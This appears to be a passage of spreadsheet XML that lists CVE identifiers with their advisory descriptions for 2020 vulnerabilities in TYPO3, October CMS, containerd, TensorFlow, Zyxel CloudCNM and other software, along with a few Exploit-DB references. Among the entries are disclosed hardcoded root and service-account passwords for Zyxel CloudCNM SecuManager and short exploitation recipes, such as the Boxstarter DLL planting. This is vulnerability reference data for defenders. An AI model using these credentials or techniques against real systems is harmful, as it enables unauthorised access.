  <si>
    <t>CVE-2020-15241</t>
  </si>
  <si>
    <t>TYPO3 Fluid Engine (package `typo3fluid/fluid`) before versions 2.0.5, 2.1.4, 2.2.1, 2.3.5, 2.4.1, 2.5.5 or 2.6.1 is vulnerable to cross-site scripting when making use of the ternary conditional operator in templates like `{showFullName ? fullName : defaultValue}`. Updated versions of this package are bundled in following TYPO3 (`typo3/cms-core`) versions as well: TYPO3 v8.7.25 (using `typo3fluid/fluid` v2.5.4) and TYPO3 v9.5.6 (using `typo3fluid/fluid` v2.6.1).</t>
  </si>
  <si>
    <t>CVE-2020-15242</t>
  </si>
  <si>
    <t>Next.js versions &gt;=9.5.0 and &lt;9.5.4 are vulnerable to an Open Redirect. Specially encoded paths could be used with the trailing slash redirect to allow an open redirect to occur to an external site. In general, this redirect does not directly harm users although can allow for phishing attacks by redirecting to an attackers domain from a trusted domain. The issue is fixed in version 9.5.4.</t>
  </si>
  <si>
    <t>CVE-2020-15243</t>
  </si>
  <si>
    <t>Affected versions of Smartstore have a missing WebApi Authentication attribute. This vulnerability affects Smartstore shops in version 4.0.0 &amp; 4.0.1 which have installed and activated the Web API plugin. Users of Smartstore 4.0.0 and 4.0.1 must merge their repository with 4.0.x or overwrite the file SmartStore.Web.Framework in the */bin* directory of the deployed shop with this file. As a workaround without updating uninstall the Web API plugin to close this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-15244</t>
  </si>
  <si>
    <t>In Magento (rubygems openmage/magento-lts package) before versions 19.4.8 and 20.0.4, an admin user can generate soap credentials that can be used to trigger RCE via PHP Object Injection through product attributes and a product. The issue is patched in versions 19.4.8 and 20.0.4.</t>
  </si>
  <si>
    <t>CVE-2020-15245</t>
  </si>
  <si>
    <t>In Sylius before versions 1.6.9, 1.7.9 and 1.8.3, the user may register in a shop by email mail@example.com, verify it, change it to the mail another@domain.com and stay verified and enabled. This may lead to having accounts addressed to totally different emails, that were verified. Note, that this way one is not able to take over any existing account (guest or normal one). The issue has been patched in Sylius 1.6.9, 1.7.9 and 1.8.3. As a workaround, you may resolve this issue on your own by creating a custom event listener, which will listen to the sylius.customer.pre_update event. You can determine that email has been changed if customer email and user username are different. They are synchronized later on. Pay attention, to email changing behavior for administrators. You may need to skip this logic for them. In order to achieve this, you should either check master request path info, if it does not contain /admin prefix or adjust event triggered during customer update in the shop. You can find more information on how to customize the event here.</t>
  </si>
  <si>
    <t>CVE-2020-15246</t>
  </si>
  <si>
    <t>October is a free, open-source, self-hosted CMS platform based on the Laravel PHP Framework. In October CMS from version 1.0.421 and before version 1.0.469, an attacker can read local files on an October CMS server via a specially crafted request. Issue has been patched in Build 469 (v1.0.469) and v1.1.0.</t>
  </si>
  <si>
    <t>CVE-2020-15247</t>
  </si>
  <si>
    <t>October is a free, open-source, self-hosted CMS platform based on the Laravel PHP Framework. In October CMS from version 1.0.319 and before version 1.0.469, an authenticated backend user with the cms.manage_pages, cms.manage_layouts, or cms.manage_partials permissions who would normally not be permitted to provide PHP code to be executed by the CMS due to cms.enableSafeMode being enabled is able to write specific Twig code to escape the Twig sandbox and execute arbitrary PHP. This is not a problem for anyone that trusts their users with those permissions to normally write &amp; manage PHP within the CMS by not having cms.enableSafeMode enabled, but would be a problem for anyone relying on cms.enableSafeMode to ensure that users with those permissions in production do not have access to write &amp; execute arbitrary PHP. Issue has been patched in Build 469 (v1.0.469) and v1.1.0.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L</t>
  </si>
  <si>
    <t>CVE-2020-15248</t>
  </si>
  <si>
    <t>October is a free, open-source, self-hosted CMS platform based on the Laravel PHP Framework. In October CMS from version 1.0.319 and before version 1.0.470, backend users with the default "Publisher" system role have access to create &amp; manage users where they can choose which role the new user has. This means that a user with "Publisher" access has the ability to escalate their access to "Developer" access. Issue has been patched in Build 470 (v1.0.470) &amp; v1.1.1.</t>
  </si>
  <si>
    <t>CVE-2020-15249</t>
  </si>
  <si>
    <t>October is a free, open-source, self-hosted CMS platform based on the Laravel PHP Framework. In October CMS from version 1.0.319 and before version 1.0.469, backend users with access to upload files were permitted to upload SVG files without any sanitization applied to the uploaded files. Since SVG files support being parsed as HTML by browsers, this means that they could theoretically upload Javascript that would be executed on a path under the website's domain (i.e. /storage/app/media/evil.svg), but they would have to convince their target to visit that location directly in the target's browser as the backend does not display SVGs inline anywhere, SVGs are only displayed as image resources in the backend and are thus unable to be executed. Issue has been patched in Build 469 (v1.0.469) &amp; v1.1.0.</t>
  </si>
  <si>
    <t>CVE-2020-1525</t>
  </si>
  <si>
    <t>A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory, aka 'Media Foundation Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-1379, CVE-2020-1477, CVE-2020-1478, CVE-2020-1492, CVE-2020-1554.</t>
  </si>
  <si>
    <t>exploits/php/webapps/49027.txt</t>
  </si>
  <si>
    <t>Anuko Time Tracker 1.19.23.5325 - CSV/Formula Injection</t>
  </si>
  <si>
    <t>CVE-2020-15250</t>
  </si>
  <si>
    <t>In JUnit4 from version 4.7 and before 4.13.1, the test rule TemporaryFolder contains a local information disclosure vulnerability. On Unix like systems, the system's temporary directory is shared between all users on that system. Because of this, when files and directories are written into this directory they are, by default, readable by other users on that same system. This vulnerability does not allow other users to overwrite the contents of these directories or files. This is purely an information disclosure vulnerability. This vulnerability impacts you if the JUnit tests write sensitive information, like API keys or passwords, into the temporary folder, and the JUnit tests execute in an environment where the OS has other untrusted users. Because certain JDK file system APIs were only added in JDK 1.7, this this fix is dependent upon the version of the JDK you are using. For Java 1.7 and higher users: this vulnerability is fixed in 4.13.1. For Java 1.6 and lower users: no patch is available, you must use the workaround below. If you are unable to patch, or are stuck running on Java 1.6, specifying the `java.io.tmpdir` system environment variable to a directory that is exclusively owned by the executing user will fix this vulnerability. For more information, including an example of vulnerable code, see the referenced GitHub Security Advisory.</t>
  </si>
  <si>
    <t>CVE-2020-15251</t>
  </si>
  <si>
    <t>In the Channelmgnt plug-in for Sopel (a Python IRC bot) before version 1.0.3, malicious users are able to op/voice and take over a channel. This is an ACL bypass vulnerability. This plugin is bundled with MirahezeBot-Plugins with versions from 9.0.0 and less than 9.0.2 affected. Version 9.0.2 includes 1.0.3 of channelmgnt, and thus is safe from this vulnerability. See referenced GHSA-23pc-4339-95vg.</t>
  </si>
  <si>
    <t>CVE-2020-15252</t>
  </si>
  <si>
    <t>In XWiki before version 12.5 and 11.10.6, any user with SCRIPT right (EDIT right before XWiki 7.4) can gain access to the application server Servlet context which contains tools allowing to instantiate arbitrary Java objects and invoke methods that may lead to arbitrary code execution. This is patched in XWiki 12.5 and XWiki 11.10.6.</t>
  </si>
  <si>
    <t>CVE-2020-15253</t>
  </si>
  <si>
    <t>Versions of Grocy &lt;= 2.7.1 are vulnerable to Cross-Site Scripting via the Create Shopping List module, that is rendered upon deleting that Shopping List. The issue was also found in users, batteries, chores, equipment, locations, quantity units, shopping locations, tasks, taskcategories, product groups, recipes and products. Authentication is required to exploit these issues and Grocy should not be publicly exposed. The linked reference details a proof-of-concept.</t>
  </si>
  <si>
    <t>CVE-2020-15254</t>
  </si>
  <si>
    <t>Crossbeam is a set of tools for concurrent programming. In crossbeam-channel before version 0.4.4, the bounded channel incorrectly assumes that `Vec::from_iter` has allocated capacity that same as the number of iterator elements. `Vec::from_iter` does not actually guarantee that and may allocate extra memory. The destructor of the `bounded` channel reconstructs `Vec` from the raw pointer based on the incorrect assumes described above. This is unsound and causing deallocation with the incorrect capacity when `Vec::from_iter` has allocated different sizes with the number of iterator elements. This has been fixed in crossbeam-channel 0.4.4.</t>
  </si>
  <si>
    <t>CVE-2020-15255</t>
  </si>
  <si>
    <t>In Anuko Time Tracker before verion 1.19.23.5325, due to not properly filtered user input a CSV export of a report could contain cells that are treated as formulas by spreadsheet software (for example, when a cell value starts with an equal sign). This is fixed in version 1.19.23.5325.</t>
  </si>
  <si>
    <t>CVE-2020-15256</t>
  </si>
  <si>
    <t>A prototype pollution vulnerability has been found in `object-path` &lt;= 0.11.4 affecting the `set()` method. The vulnerability is limited to the `includeInheritedProps` mode (if version &gt;= 0.11.0 is used), which has to be explicitly enabled by creating a new instance of `object-path` and setting the option `includeInheritedProps: true`, or by using the default `withInheritedProps` instance. The default operating mode is not affected by the vulnerability if version &gt;= 0.11.0 is used. Any usage of `set()` in versions &lt; 0.11.0 is vulnerable. The issue is fixed in object-path version 0.11.5 As a workaround, don't use the `includeInheritedProps: true` options or the `withInheritedProps` instance if using a version &gt;= 0.11.0.</t>
  </si>
  <si>
    <t>CVE-2020-15257</t>
  </si>
  <si>
    <t>containerd is an industry-standard container runtime and is available as a daemon for Linux and Windows. In containerd before versions 1.3.9 and 1.4.3, the containerd-shim API is improperly exposed to host network containers. Access controls for the shim’s API socket verified that the connecting process had an effective UID of 0, but did not otherwise restrict access to the abstract Unix domain socket. This would allow malicious containers running in the same network namespace as the shim, with an effective UID of 0 but otherwise reduced privileges, to cause new processes to be run with elevated privileges. This vulnerability has been fixed in containerd 1.3.9 and 1.4.3. Users should update to these versions as soon as they are released. It should be noted that containers started with an old version of containerd-shim should be stopped and restarted, as running containers will continue to be vulnerable even after an upgrade. If you are not providing the ability for untrusted users to start containers in the same network namespace as the shim (typically the "host" network namespace, for example with docker run --net=host or hostNetwork: true in a Kubernetes pod) and run with an effective UID of 0, you are not vulnerable to this issue. If you are running containers with a vulnerable configuration, you can deny access to all abstract sockets with AppArmor by adding a line similar to deny unix addr=@**, to your policy. It is best practice to run containers with a reduced set of privileges, with a non-zero UID, and with isolated namespaces. The containerd maintainers strongly advise against sharing namespaces with the host. Reducing the set of isolation mechanisms used for a container necessarily increases that container's privilege, regardless of what container runtime is used for running that container.</t>
  </si>
  <si>
    <t>CVE-2020-15258</t>
  </si>
  <si>
    <t>In Wire before 3.20.x, `shell.openExternal` was used without checking the URL. This vulnerability allows an attacker to execute code on the victims machine by sending messages containing links with arbitrary protocols. The victim has to interact with the link and sees the URL that is opened. The issue was patched by implementing a helper function which checks if the URL's protocol is common. If it is common, the URL will be opened externally. If not, the URL will not be opened and a warning appears for the user informing them that a probably insecure URL was blocked from being executed. The issue is patched in Wire 3.20.x. More technical details about exploitation are available in the linked advisory.</t>
  </si>
  <si>
    <t>CVE-2020-15259</t>
  </si>
  <si>
    <t>ad-ldap-connector's admin panel before version 5.0.13 does not provide csrf protection, which when exploited may result in remote code execution or confidential data loss. CSRF exploits may occur if the user visits a malicious page containing CSRF payload on the same machine that has access to the ad-ldap-connector admin console via a browser. You may be affected if you use the admin console included with ad-ldap-connector versions &lt;=5.0.12. If you do not have ad-ldap-connector admin console enabled or do not visit any other public URL while on the machine it is installed on, you are not affected. The issue is fixed in version 5.0.13.</t>
  </si>
  <si>
    <t>CVE-2020-1526</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Network Connection Broker improperly handles memory.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows Network Connection Broker Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>exploits/windows/local/49925.txt</t>
  </si>
  <si>
    <t>Veyon 4.4.1 - 'VeyonService' Unquoted Service Path</t>
  </si>
  <si>
    <t>2021-06-01</t>
  </si>
  <si>
    <t>CVE-2020-15260</t>
  </si>
  <si>
    <t>PJSIP is a free and open source multimedia communication library written in C language implementing standard based protocols such as SIP, SDP, RTP, STUN, TURN, and ICE. In version 2.10 and earlier, PJSIP transport can be reused if they have the same IP address + port + protocol. However, this is insufficient for secure transport since it lacks remote hostname authentication. Suppose we have created a TLS connection to `sip.foo.com`, which has an IP address `100.1.1.1`. If we want to create a TLS connection to another hostname, say `sip.bar.com`, which has the same IP address, then it will reuse that existing connection, even though `100.1.1.1` does not have certificate to authenticate as `sip.bar.com`. The vulnerability allows for an insecure interaction without user awareness. It affects users who need access to connections to different destinations that translate to the same address, and allows man-in-the-middle attack if attacker can route a connection to another destination such as in the case of DNS spoofing.</t>
  </si>
  <si>
    <t>CVE-2020-15261</t>
  </si>
  <si>
    <t>On Windows the Veyon Service before version 4.4.2 contains an unquoted service path vulnerability, allowing locally authenticated users with administrative privileges to run malicious executables with LocalSystem privileges. Since Veyon users (both students and teachers) usually don't have administrative privileges, this vulnerability is only dangerous in anyway unsafe setups. The problem has been fixed in version 4.4.2. As a workaround, the exploitation of the vulnerability can be prevented by revoking administrative privileges from all potentially untrustworthy users.</t>
  </si>
  <si>
    <t>CVE-2020-15262</t>
  </si>
  <si>
    <t>In webpack-subresource-integrity before version 1.5.1, all dynamically loaded chunks receive an invalid integrity hash that is ignored by the browser, and therefore the browser cannot validate their integrity. This removes the additional level of protection offered by SRI for such chunks. Top-level chunks are unaffected. This issue is patched in version 1.5.1.</t>
  </si>
  <si>
    <t>CVE-2020-15263</t>
  </si>
  <si>
    <t>In platform before version 9.4.4, inline attributes are not properly escaped. If the data that came from users was not escaped, then an XSS vulnerability is possible. The issue was introduced in 9.0.0 and fixed in 9.4.4.</t>
  </si>
  <si>
    <t>CVE-2020-15264</t>
  </si>
  <si>
    <t>The Boxstarter installer before version 2.13.0 configures C:\ProgramData\Boxstarter to be in the system-wide PATH environment variable. However, this directory is writable by normal, unprivileged users. To exploit the vulnerability, place a DLL in this directory that a privileged service is looking for. For example, WptsExtensions.dll When Windows starts, it'll execute the code in DllMain() with SYSTEM privileges. Any unprivileged user can execute code with SYSTEM privileges. The issue is fixed in version 3.13.0</t>
  </si>
  <si>
    <t>CVE-2020-15265</t>
  </si>
  <si>
    <t>In Tensorflow before version 2.4.0, an attacker can pass an invalid `axis` value to `tf.quantization.quantize_and_dequantize`. This results in accessing a dimension outside the rank of the input tensor in the C++ kernel implementation. However, dim_size only does a DCHECK to validate the argument and then uses it to access the corresponding element of an array. Since in normal builds, `DCHECK`-like macros are no-ops, this results in segfault and access out of bounds of the array. The issue is patched in eccb7ec454e6617738554a255d77f08e60ee0808 and TensorFlow 2.4.0 will be released containing the patch. TensorFlow nightly packages after this commit will also have the issue resolved.</t>
  </si>
  <si>
    <t>CVE-2020-15266</t>
  </si>
  <si>
    <t>In Tensorflow before version 2.4.0, when the `boxes` argument of `tf.image.crop_and_resize` has a very large value, the CPU kernel implementation receives it as a C++ `nan` floating point value. Attempting to operate on this is undefined behavior which later produces a segmentation fault. The issue is patched in eccb7ec454e6617738554a255d77f08e60ee0808 and TensorFlow 2.4.0 will be released containing the patch. TensorFlow nightly packages after this commit will also have the issue resolved.</t>
  </si>
  <si>
    <t>CVE-2020-15269</t>
  </si>
  <si>
    <t>In Spree before versions 3.7.11, 4.0.4, or 4.1.11, expired user tokens could be used to access Storefront API v2 endpoints. The issue is patched in versions 3.7.11, 4.0.4 and 4.1.11. A workaround without upgrading is described in the linked advisory.</t>
  </si>
  <si>
    <t>CVE-2020-1527</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Custom Protocol Engine improperly handles memory.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows Custom Protocol Engine Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-15270</t>
  </si>
  <si>
    <t>Parse Server (npm package parse-server) broadcasts events to all clients without checking if the session token is valid. This allows clients with expired sessions to still receive subscription objects. It is not possible to create subscription objects with invalid session tokens. The issue is not patched.</t>
  </si>
  <si>
    <t>CVE-2020-15271</t>
  </si>
  <si>
    <t>In lookatme (python/pypi package) versions prior to 2.3.0, the package automatically loaded the built-in "terminal" and "file_loader" extensions. Users that use lookatme to render untrusted markdown may have malicious shell commands automatically run on their system. This is fixed in version 2.3.0. As a workaround, the `lookatme/contrib/terminal.py` and `lookatme/contrib/file_loader.py` files may be manually deleted. Additionally, it is always recommended to be aware of what is being rendered with lookatme.</t>
  </si>
  <si>
    <t>CVE-2020-15272</t>
  </si>
  <si>
    <t>In the git-tag-annotation-action (open source GitHub Action) before version 1.0.1, an attacker can execute arbitrary (*) shell commands if they can control the value of [the `tag` input] or manage to alter the value of [the `GITHUB_REF` environment variable]. The problem has been patched in version 1.0.1. If you don't use the `tag` input you are most likely safe. The `GITHUB_REF` environment variable is protected by the GitHub Actions environment so attacks from there should be impossible. If you must use the `tag` input and cannot upgrade to `&gt; 1.0.0` make sure that the value is not controlled by another Action.</t>
  </si>
  <si>
    <t>CVE-2020-15273</t>
  </si>
  <si>
    <t>baserCMS before version 4.4.1 is vulnerable to Cross-Site Scripting. The issue affects the following components: Edit feed settings, Edit widget area, Sub site new registration, New category registration. Arbitrary JavaScript may be executed by entering specific characters in the account that can access the file upload function category list, subsite setting list, widget area edit, and feed list on the management screen. The issue was introduced in version 4.0.0. It is fixed in version 4.4.1.</t>
  </si>
  <si>
    <t>CVE-2020-15274</t>
  </si>
  <si>
    <t>In Wiki.js before version 2.5.162, an XSS payload can be injected in a page title and executed via the search results. While the title is properly escaped in both the navigation links and the actual page title, it is not the case in the search results. Commit a57d9af34c15adbf460dde6553d964efddf433de fixes this vulnerability (version 2.5.162) by properly escaping the text content displayed in the search results.</t>
  </si>
  <si>
    <t>CVE-2020-15275</t>
  </si>
  <si>
    <t>MoinMoin is a wiki engine. In MoinMoin before version 1.9.11, an attacker with write permissions can upload an SVG file that contains malicious javascript. This javascript will be executed in a user's browser when the user is viewing that SVG file on the wiki. Users are strongly advised to upgrade to a patched version. MoinMoin Wiki 1.9.11 has the necessary fixes and also contains other important fixes.</t>
  </si>
  <si>
    <t>CVE-2020-15276</t>
  </si>
  <si>
    <t>baserCMS before version 4.4.1 is vulnerable to Cross-Site Scripting. Arbitrary JavaScript may be executed by entering a crafted nickname in blog comments. The issue affects the blog comment component. It is fixed in version 4.4.1.</t>
  </si>
  <si>
    <t>CVE-2020-15277</t>
  </si>
  <si>
    <t>baserCMS before version 4.4.1 is affected by Remote Code Execution (RCE). Code may be executed by logging in as a system administrator and uploading an executable script file such as a PHP file. The Edit template component is vulnerable. The issue is fixed in version 4.4.1.</t>
  </si>
  <si>
    <t>CVE-2020-15278</t>
  </si>
  <si>
    <t>Red Discord Bot before version 3.4.1 has an unauthorized privilege escalation exploit in the Mod module. This exploit allows Discord users with a high privilege level within the guild to bypass hierarchy checks when the application is in a specific condition that is beyond that user's control. By abusing this exploit, it is possible to perform destructive actions within the guild the user has high privileges in. This exploit has been fixed in version 3.4.1. As a workaround, unloading the Mod module with unload mod or, disabling the massban command with command disable global massban can render this exploit not accessible. We still highly recommend updating to 3.4.1 to completely patch this issue.</t>
  </si>
  <si>
    <t>CVE-2020-15279</t>
  </si>
  <si>
    <t>An Improper Access Control vulnerability in the logging component of Bitdefender Endpoint Security Tools for Windows versions prior to 6.6.23.320 allows a regular user to learn the scanning exclusion paths. This issue was discovered during external security research.</t>
  </si>
  <si>
    <t>CVE-2020-1528</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Radio Manager API improperly handles memory.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows Radio Manager API Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-1529</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory, aka 'Windows GDI Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1480.</t>
  </si>
  <si>
    <t>CVE-2020-15292</t>
  </si>
  <si>
    <t>Lack of validation on data read from guest memory in IntPeGetDirectory, IntPeParseUnwindData, IntLogExceptionRecord, IntKsymExpandSymbol and IntLixTaskDumpTree may lead to out-of-bounds read or it could cause DoS due to integer-overflor (IntPeGetDirectory), TOCTOU (IntPeParseUnwindData) or insufficient validations.</t>
  </si>
  <si>
    <t>CVE-2020-15293</t>
  </si>
  <si>
    <t>Memory corruption in IntLixCrashDumpDmesg, IntLixTaskFetchCmdLine, IntLixFileReadDentry and IntLixFileGetPath due to insufficient guest-data input validation may lead to denial of service conditions.</t>
  </si>
  <si>
    <t>CVE-2020-15294</t>
  </si>
  <si>
    <t>Compiler Optimization Removal or Modification of Security-critical Code vulnerability in IntPeParseUnwindData() results in multiple dereferences to the same pointer. If the pointer is located in memory-mapped from the guest space, this may cause a race-condition where the generated code would dereference the same address twice, thus obtaining different values, which may lead to arbitrary code execution. This issue affects: Bitdefender Hypervisor Introspection versions prior to 1.132.2.</t>
  </si>
  <si>
    <t>CVE-2020-15297</t>
  </si>
  <si>
    <t>Insufficient validation in the Bitdefender Update Server and BEST Relay components of Bitdefender Endpoint Security Tools versions prior to 6.6.20.294 allows an unprivileged attacker to bypass the in-place mitigations and interact with hosts on the network. This issue affects: Bitdefender Update Server versions prior to 6.6.20.294.</t>
  </si>
  <si>
    <t>CVE-2020-15299</t>
  </si>
  <si>
    <t>A reflected Cross-Site Scripting (XSS) Vulnerability in the KingComposer plugin through 2.9.4 for WordPress allows remote attackers to trick a victim into submitting an install_online_preset AJAX request containing base64-encoded JavaScript (in the kc-online-preset-data POST parameter) that is executed in the victim's browser.</t>
  </si>
  <si>
    <t>CVE-2020-1530</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when Windows Remote Access improperly handles memory.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows Remote Access Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1537.</t>
  </si>
  <si>
    <t>CVE-2020-15300</t>
  </si>
  <si>
    <t>SuiteCRM through 7.11.13 has an Open Redirect in the Documents module via a crafted SVG document.</t>
  </si>
  <si>
    <t>CVE-2020-15301</t>
  </si>
  <si>
    <t>SuiteCRM through 7.11.13 allows CSV Injection via registration fields in the Accounts, Contacts, Opportunities, and Leads modules. These fields are mishandled during a Download Import File Template operation.</t>
  </si>
  <si>
    <t>CVE-2020-15302</t>
  </si>
  <si>
    <t>In Argent RecoveryManager before 0xdc350d09f71c48c5D22fBE2741e4d6A03970E192, the executeRecovery function does not require any signatures in the zero-guardian case, which allows attackers to cause a denial of service (locking) or a takeover.</t>
  </si>
  <si>
    <t>CVE-2020-15303</t>
  </si>
  <si>
    <t>Infoblox NIOS before 8.5.2 allows entity expansion during an XML upload operation, a related issue to CVE-2003-1564.</t>
  </si>
  <si>
    <t>CVE-2020-15304</t>
  </si>
  <si>
    <t>An issue was discovered in OpenEXR before 2.5.2. An invalid tiled input file could cause invalid memory access in TiledInputFile::TiledInputFile() in IlmImf/ImfTiledInputFile.cpp, as demonstrated by a NULL pointer dereference.</t>
  </si>
  <si>
    <t>CVE-2020-15305</t>
  </si>
  <si>
    <t>An issue was discovered in OpenEXR before 2.5.2. Invalid input could cause a use-after-free in DeepScanLineInputFile::DeepScanLineInputFile() in IlmImf/ImfDeepScanLineInputFile.cpp.</t>
  </si>
  <si>
    <t>CVE-2020-15306</t>
  </si>
  <si>
    <t>An issue was discovered in OpenEXR before v2.5.2. Invalid chunkCount attributes could cause a heap buffer overflow in getChunkOffsetTableSize() in IlmImf/ImfMisc.cpp.</t>
  </si>
  <si>
    <t>CVE-2020-15307</t>
  </si>
  <si>
    <t>Nozomi Guardian before 19.0.4 allows attackers to achieve stored XSS (in the web front end) by leveraging the ability to create a custom field with a crafted field name.</t>
  </si>
  <si>
    <t>CVE-2020-15308</t>
  </si>
  <si>
    <t>Support Incident Tracker (aka SiT! or SiTracker) 3.67 p2 allows post-authentication SQL injection via the site_edit.php typeid or site parameter, the search_incidents_advanced.php search_title parameter, or the report_qbe.php criteriafield parameter.</t>
  </si>
  <si>
    <t>CVE-2020-15309</t>
  </si>
  <si>
    <t>An issue was discovered in wolfSSL before 4.5.0, when single precision is not employed. Local attackers can conduct a cache-timing attack against public key operations. These attackers may already have obtained sensitive information if the affected system has been used for private key operations (e.g., signing with a private key).</t>
  </si>
  <si>
    <t>CVE-2020-1531</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Accounts Control improperly handles memory.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows Accounts Control Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-15312</t>
  </si>
  <si>
    <t>Zyxel CloudCNM SecuManager 3.1.0 and 3.1.1 has a hardcoded DSA SSH key for the root account.</t>
  </si>
  <si>
    <t>CVE-2020-15313</t>
  </si>
  <si>
    <t>Zyxel CloudCNM SecuManager 3.1.0 and 3.1.1 has a hardcoded ECDSA SSH key for the root account.</t>
  </si>
  <si>
    <t>CVE-2020-15314</t>
  </si>
  <si>
    <t>Zyxel CloudCNM SecuManager 3.1.0 and 3.1.1 has a hardcoded RSA SSH key for the root account.</t>
  </si>
  <si>
    <t>CVE-2020-15315</t>
  </si>
  <si>
    <t>Zyxel CloudCNM SecuManager 3.1.0 and 3.1.1 has a hardcoded DSA SSH key for the root account within the /opt/axess chroot directory tree.</t>
  </si>
  <si>
    <t>CVE-2020-15316</t>
  </si>
  <si>
    <t>Zyxel CloudCNM SecuManager 3.1.0 and 3.1.1 has a hardcoded ECDSA SSH key for the root account within the /opt/axess chroot directory tree.</t>
  </si>
  <si>
    <t>CVE-2020-15317</t>
  </si>
  <si>
    <t>Zyxel CloudCNM SecuManager 3.1.0 and 3.1.1 has a hardcoded RSA SSH key for the root account within the /opt/axess chroot directory tree.</t>
  </si>
  <si>
    <t>CVE-2020-15318</t>
  </si>
  <si>
    <t>Zyxel CloudCNM SecuManager 3.1.0 and 3.1.1 has a hardcoded DSA SSH key for the root account within the /opt/mysql chroot directory tree.</t>
  </si>
  <si>
    <t>CVE-2020-15319</t>
  </si>
  <si>
    <t>Zyxel CloudCNM SecuManager 3.1.0 and 3.1.1 has a hardcoded RSA SSH key for the root account within the /opt/mysql chroot directory tree.</t>
  </si>
  <si>
    <t>CVE-2020-1532</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows InstallService improperly handles memory.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows InstallService Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-15320</t>
  </si>
  <si>
    <t>Zyxel CloudCNM SecuManager 3.1.0 and 3.1.1 has the axiros password for the root account.</t>
  </si>
  <si>
    <t>CVE-2020-15321</t>
  </si>
  <si>
    <t>Zyxel CloudCNM SecuManager 3.1.0 and 3.1.1 has the axzyxel password for the livedbuser account.</t>
  </si>
  <si>
    <t>CVE-2020-15322</t>
  </si>
  <si>
    <t>Zyxel CloudCNM SecuManager 3.1.0 and 3.1.1 has the wbboEZ4BN3ssxAfM hardcoded password for the debian-sys-maint account.</t>
  </si>
  <si>
    <t>CVE-2020-15323</t>
  </si>
  <si>
    <t>Zyxel CloudCNM SecuManager 3.1.0 and 3.1.1 has the cloud1234 password for the a1@chopin account default credentials.</t>
  </si>
  <si>
    <t>CVE-2020-15324</t>
  </si>
  <si>
    <t>Zyxel CloudCNM SecuManager 3.1.0 and 3.1.1 has a world-readable axess/opt/axXMPPHandler/config/xmpp_config.py file that stores hardcoded credentials.</t>
  </si>
  <si>
    <t>CVE-2020-15325</t>
  </si>
  <si>
    <t>Zyxel CloudCNM SecuManager 3.1.0 and 3.1.1 has a hardcoded Erlang cookie for ejabberd replication.</t>
  </si>
  <si>
    <t>CVE-2020-15326</t>
  </si>
  <si>
    <t>Zyxel CloudCNM SecuManager 3.1.0 and 3.1.1 has a hardcoded certificate for Ejabberd in ejabberd.pem.</t>
  </si>
  <si>
    <t>CVE-2020-15327</t>
  </si>
  <si>
    <t>Zyxel CloudCNM SecuManager 3.1.0 and 3.1.1 uses ZODB storage without authentication.</t>
  </si>
  <si>
    <t>CVE-2020-15328</t>
  </si>
  <si>
    <t>Zyxel CloudCNM SecuManager 3.1.0 and 3.1.1 has weak /opt/axess/var/blobstorage/ permissions.</t>
  </si>
  <si>
    <t>CVE-2020-15329</t>
  </si>
  <si>
    <t>Zyxel CloudCNM SecuManager 3.1.0 and 3.1.1 has weak Data.fs permissions.</t>
  </si>
  <si>
    <t>CVE-2020-1533</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in the way that the Windows WalletService handles objects in memory, aka 'Windows WalletService Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1556.</t>
  </si>
  <si>
    <t>CVE-2020-15330</t>
  </si>
  <si>
    <t>Zyxel CloudCNM SecuManager 3.1.0 and 3.1.1 has a hardcoded APP_KEY in /opt/axess/etc/default/axess.</t>
  </si>
  <si>
    <t>CVE-2020-15331</t>
  </si>
  <si>
    <t>Zyxel CloudCNM SecuManager 3.1.0 and 3.1.1 has a hardcoded OAUTH_SECRET_KEY in /opt/axess/etc/default/axess.</t>
  </si>
  <si>
    <t>CVE-2020-15332</t>
  </si>
  <si>
    <t>Zyxel CloudCNM SecuManager 3.1.0 and 3.1.1 has weak /opt/axess/etc/default/axess permissions.</t>
  </si>
  <si>
    <t>CVE-2020-15333</t>
  </si>
  <si>
    <t>Zyxel CloudCNM SecuManager 3.1.0 and 3.1.1 allows attackers to discover accounts via MySQL "select * from Administrator_users" and "select * from Users_users" requests.</t>
  </si>
  <si>
    <t>CVE-2020-15334</t>
  </si>
  <si>
    <t>Zyxel CloudCNM SecuManager 3.1.0 and 3.1.1 allows escape-sequence injection into the /var/log/axxmpp.log file.</t>
  </si>
  <si>
    <t>CVE-2020-15335</t>
  </si>
  <si>
    <t>Zyxel CloudCNM SecuManager 3.1.0 and 3.1.1 has no authentication for /registerCpe requests.</t>
  </si>
  <si>
    <t>CVE-2020-15336</t>
  </si>
  <si>
    <t>Zyxel CloudCNM SecuManager 3.1.0 and 3.1.1 has no authentication for /cnr requests.</t>
  </si>
  <si>
    <t>CVE-2020-15337</t>
  </si>
  <si>
